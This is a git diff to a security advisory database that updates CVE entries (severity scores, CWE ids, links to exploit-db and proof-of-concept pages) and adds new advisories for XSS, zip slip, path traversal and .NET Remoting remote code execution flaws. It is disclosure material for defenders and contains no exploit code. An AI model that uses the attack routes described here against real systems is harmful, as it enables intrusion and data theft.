+1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m77w-6vjw-wh2f", - "modified": "2025-10-22T00:32:51Z", + "modified": "2026-02-13T18:31:21Z", "published": "2023-10-03T18:30:23Z", "aliases": [ "CVE-2023-4911" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt" }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/52479" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5514" diff --git a/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json b/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json index 894979a1e4a75..8da2aba8e0444 100644 --- a/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json +++ b/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2g3f-rmh8-cj3f", - "modified": "2024-08-01T15:32:11Z", + "modified": "2026-02-13T18:31:21Z", "published": "2024-07-26T18:30:36Z", "aliases": [ "CVE-2024-41355" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://github.com/phpipam/phpipam/issues/4151" + }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2024-41355.md" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json b/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json index b0fd64a9bed9d..1b1ea338bedd4 100644 --- a/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json +++ b/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x34v-6wh4-m93r", - "modified": "2024-08-28T18:31:54Z", + "modified": "2026-02-13T18:31:21Z", "published": "2024-08-23T21:30:42Z", "aliases": [ "CVE-2024-42845" @@ -30,6 +30,10 @@ { "type": "WEB", "url": "https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845" + }, + { + "type": "WEB", + "url": "https://www.partywave.site/show/research/tic-tac-beware-of-your-scan" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json b/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json index 52ec270b94cbf..a31409f884714 100644 --- a/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json +++ b/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mqf-9q34-g8c2", - "modified": "2024-09-26T18:31:43Z", + "modified": "2026-02-13T18:31:21Z", "published": "2024-09-25T18:31:20Z", "aliases": [ "CVE-2024-44825" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-44825" + }, + { + "type": "WEB", + "url": "https://www.partywave.site/show/research/cve-2024-44825-invesalius-arbitrary-file-write-and-directory-traversal" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json b/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json index 28cfa25dc6b48..4e6d01952c490 100644 --- a/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json +++ b/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9w8w-fgjg-w972", - "modified": "2025-01-08T15:31:10Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-01-07T21:30:55Z", "aliases": [ "CVE-2024-54819" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://github.com/partywavesec/CVE-2024-55557" + }, + { + "type": "WEB", + "url": "https://www.partywave.site/show/research/cve-2024-54819-i-librarian-server-side-request-forgery" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json b/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json index 0aa516242b13f..78e4b4b3a2e37 100644 --- a/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json +++ b/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6v67-599p-fprc", - "modified": "2026-02-04T21:30:24Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-03-11T18:32:17Z", "aliases": [ "CVE-2025-24054" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://www.exploit-db.com/exploits/52478" }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/52480" + }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24054-spoofing-vulnerability-in-windows-ntlm-by-microsoft-detection-script" diff --git a/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json b/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json index a606c1457cf8f..c1250f1d77225 100644 --- a/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json +++ b/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9x7h-v87g-j6jw", - "modified": "2025-11-03T21:33:35Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-04-16T15:34:40Z", "aliases": [ "CVE-2025-22042" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: add bounds check for create lease context\n\nAdd missing bounds check for create lease context.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -45,7 +50,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-04-16T15:15:57Z" diff --git a/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json b/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json index 2d8112bee4640..b4113fb52372a 100644 --- a/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json +++ b/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rr66-qxh8-8qwq", - "modified": "2025-11-03T21:33:41Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-04-18T15:31:38Z", "aliases": [ "CVE-2025-38575" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: use aead_request_free to match aead_request_alloc\n\nUse aead_request_free() instead of kfree() to properly free memory\nallocated by aead_request_alloc(). This ensures sensitive crypto data\nis zeroed before being freed.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -49,7 +54,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-04-18T07:15:43Z" diff --git a/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json b/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json index 9c547ebccacdd..73b8e02f6ca39 100644 --- a/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json +++ b/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-45gw-fx24-h4pv", - "modified": "2025-11-03T21:33:45Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-05-01T15:31:44Z", "aliases": [ "CVE-2025-37778" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix dangling pointer in krb_authenticate\n\nkrb_authenticate frees sess->user and does not set the pointer\nto NULL. It calls ksmbd_krb5_authenticate to reinitialise\nsess->user but that function may return without doing so. If\nthat happens then smb2_sess_setup, which calls krb_authenticate,\nwill be accessing free'd memory when it later uses sess->user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-05-01T14:15:41Z" diff --git a/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json b/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json index cd01d81fe78dc..ba3496731c0c4 100644 --- a/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json +++ b/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-75wh-ww84-2q6c", - "modified": "2025-11-03T21:33:45Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-05-01T15:31:44Z", "aliases": [ "CVE-2025-37775" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix the warning from __kernel_write_iter\n\n[ 2110.972290] ------------[ cut here ]------------\n[ 2110.972301] WARNING: CPU: 3 PID: 735 at fs/read_write.c:599 __kernel_write_iter+0x21b/0x280\n\nThis patch doesn't allow writing to directory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -41,7 +46,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-05-01T14:15:41Z" diff --git a/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json b/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json index 72397ebf2061f..a72de6e88a2fd 100644 --- a/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json +++ b/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4vjp-phjj-3f57", - "modified": "2025-11-05T00:31:24Z", + "modified": "2026-02-13T18:31:21Z", "published": "2025-08-13T18:31:24Z", "aliases": [ "CVE-2025-34153" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34153" }, + { + "type": "WEB", + "url": "https://community.hyland.com/resources/bulletins-and-notices/210540-security-update-hyland-timer-service-bulletin-ob2025-02" + }, { "type": "WEB", "url": "https://gist.github.com/VAMorales/32794cccc2195a935623a12ef32760dc" diff --git a/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json b/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json index a15e1d31feffe..988fb2d59f60f 100644 --- a/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json +++ b/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-79" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json b/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json index 36d4053526d62..e9c314581dda1 100644 --- a/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json +++ b/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2886-9536-rhhj", - "modified": "2025-11-13T18:31:05Z", + "modified": "2026-02-13T18:31:22Z", "published": "2025-11-13T18:31:05Z", "aliases": [ "CVE-2025-12784" ], "details": "Certain HP LaserJet Pro printers may be vulnerable to information disclosure leading to credential exposure by altering the scan/send destination address and/or modifying the LDAP Server.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json b/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json index 81e7266466163..b3ec5d510064b 100644 --- a/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json +++ b/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rfj8-8392-mfcm", - "modified": "2025-11-13T18:31:05Z", + "modified": "2026-02-13T18:31:22Z", "published": "2025-11-13T18:31:05Z", "aliases": [ "CVE-2025-12785" ], "details": "Certain HP LaserJet Pro printers may be vulnerable to information disclosure leading to credential exposure by altering the scan/send destination address and/or modifying the LDAP Server.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index cc4fc102d8088..c8e47565d98ec 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-11T15:30:21Z", + "modified": "2026-02-13T18:31:23Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -47,6 +47,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2072" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2064" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1736" diff --git a/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json b/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json index e705d9d130360..16244a5359ebd 100644 --- a/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json +++ b/advisories/unreviewed/2025/12/GHSA-5wfc-7v23-c2vf/GHSA-5wfc-7v23-c2vf.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5wfc-7v23-c2vf", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-13T18:31:23Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47724" ], "details": "STVS ProVision 5.9.10 contains a path traversal vulnerability that allows authenticated attackers to access arbitrary files by manipulating the files parameter in the archive download functionality. Attackers can send GET requests to /archive/download with directory traversal sequences to read sensitive system files like /etc/passwd.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json index 7652fb69f6540..a46c72ac4d3be 100644 --- a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json +++ b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5mc7-p6pj-r3f5", - "modified": "2026-01-21T00:31:42Z", + "modified": "2026-02-13T18:31:23Z", "published": "2026-01-21T00:31:42Z", "aliases": [ "CVE-2026-0865" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/python/cpython/commit/4802b96a2cde58570c24c13ef3289490980961c5" }, + { + "type": "WEB", + "url": "https://github.com/python/cpython/commit/66da7bf6fe7b81e3ecc9c0a25bd47d4616c8d1a6" + }, { "type": "WEB", "url": "https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995" diff --git a/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json b/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json index a122bc92e7d86..9d3113da8a192 100644 --- a/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json +++ b/advisories/unreviewed/2026/01/GHSA-jh94-8q48-f3m3/GHSA-jh94-8q48-f3m3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jh94-8q48-f3m3", - "modified": "2026-01-26T15:31:19Z", + "modified": "2026-02-13T18:31:23Z", "published": "2026-01-23T18:31:30Z", "aliases": [ "CVE-2026-1299" @@ -47,6 +47,10 @@ "type": "WEB", "url": "https://github.com/python/cpython/commit/8cdf6204f4ae821f32993f8fc6bad0d318f95f36" }, + { + "type": "WEB", + "url": "https://github.com/python/cpython/commit/e417f05ad77a4c30ddc07f99e90fc0cef43e831a" + }, { "type": "WEB", "url": "https://cve.org/CVERecord?id=CVE-2024-6923" diff --git a/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json b/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json index 1faa991ec0136..3ff46cfdcb468 100644 --- a/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json +++ b/advisories/unreviewed/2026/01/GHSA-qg84-jfh7-8hpx/GHSA-qg84-jfh7-8hpx.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json b/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json new file mode 100644 index 0000000000000..c74d239c86fb0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-224f-wm46-5p4r", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-66676" + ], + "details": "An issue in IObit Unlocker v1.3.0.11 allows attackers to cause a Denial of Service (DoS) via a crafted request.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66676" + }, + { + "type": "WEB", + "url": "https://github.com/cwjchoi01/CVE-2025-66676" + }, + { + "type": "WEB", + "url": "https://www.iobit.com/en/iobit-unlocker.php" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T18:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json index 26994f0e7141f..2eb69b7c705fb 100644 --- a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json +++ b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json b/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json new file mode 100644 index 0000000000000..c40923c22e7bf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3669-8ww5-g35f", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70094" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Generate Item Barcode function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Item Category parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70094" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos/pull/4357" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70094.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json index 54661722df369..7acac638a91ea 100644 --- a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json +++ b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3q2x-q945-c5mm", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2019-25314" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://www.vulncheck.com/advisories/duplicate-post-persistent-cross-site-scripting" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duplicate-post/yoast-duplicate-post-323-authenticated-admin-stored-cross-site-scripting" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json b/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json new file mode 100644 index 0000000000000..8da634476cc20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gg4-26q8-wv28", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-69770" + ], + "details": "A zip slip vulnerability in the /DesignTools/SkinList.aspx endpoint of MojoPortal CMS v2.9.0.1 allows attackers to execute arbitrary commands via uploading a crafted zip file.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69770" + }, + { + "type": "WEB", + "url": "https://github.com/i7MEDIA/mojoportal/security" + }, + { + "type": "WEB", + "url": "https://github.com/kid-tnt/Mojo-check/blob/main/Zipslip%20in%20MojoPortal%20version%202.9.0.1.md" + }, + { + "type": "WEB", + "url": "https://www.mojoportal.com/mojoportal-2-9-1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T18:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json b/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json new file mode 100644 index 0000000000000..f05c070281e27 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5wr5-vxhh-x7gm", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-26221" + ], + "details": "Hyland OnBase contains an unauthenticated .NET Remoting exposure in the OnBase Workflow Timer Service (Hyland.Core.Workflow.NTService.exe). An attacker who can reach the service can send crafted .NET Remoting requests to default HTTP channel endpoints on TCP/8900 (e.g., TimerServiceAPI.rem and TimerServiceEvents.rem for Workflow) to trigger unsafe object unmarshalling, enabling arbitrary file read/write. By writing attacker-controlled content into web-accessible locations or chaining with other OnBase features, this can lead to remote code execution. The same primitive can be abused by supplying a UNC path to coerce outbound NTLM authentication (SMB coercion) to an attacker-controlled host.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26221" + }, + { + "type": "WEB", + "url": "https://community.hyland.com/resources/bulletins-and-notices/223223-security-update-onbase-workflow-timer-service-bulletin-ob2025-03" + }, + { + "type": "WEB", + "url": "https://www.hyland.com/en/solutions/products/onbase" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/hyland-onbase-timer-services-unauthenticated-net-remoting-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:11Z" + } 